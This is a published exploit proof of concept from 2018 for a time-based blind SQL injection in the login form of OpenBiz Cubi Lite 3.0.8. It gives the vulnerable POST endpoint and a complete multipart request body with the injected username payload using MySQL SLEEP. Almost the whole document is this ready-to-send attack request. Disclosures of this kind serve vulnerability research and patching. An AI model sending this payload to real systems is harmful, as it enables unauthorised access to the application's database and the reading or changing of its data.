# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
# Date: 2018-11-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
# Version: v3.0.8
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
# Exploiting this issue could allow an attacker to compromise the application,
# access or modify data, or exploit latent  vulnerabilities in the underlying database.
#########################################################
# PoC : SQLi :
 
# POST : POST
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
# Parameter: MULTIPART username ((custom) POST)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
 
 
# Payload:
 
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="username"
 
admin' AND SLEEP(5)-- JgaK
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="password"
 
password
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
 
Don't save session
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
 
0
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"
 
English ( en_US )
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"
 
en_US
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="btn_client_login"
 
 
-----------------------------71911072106778878648823492--
---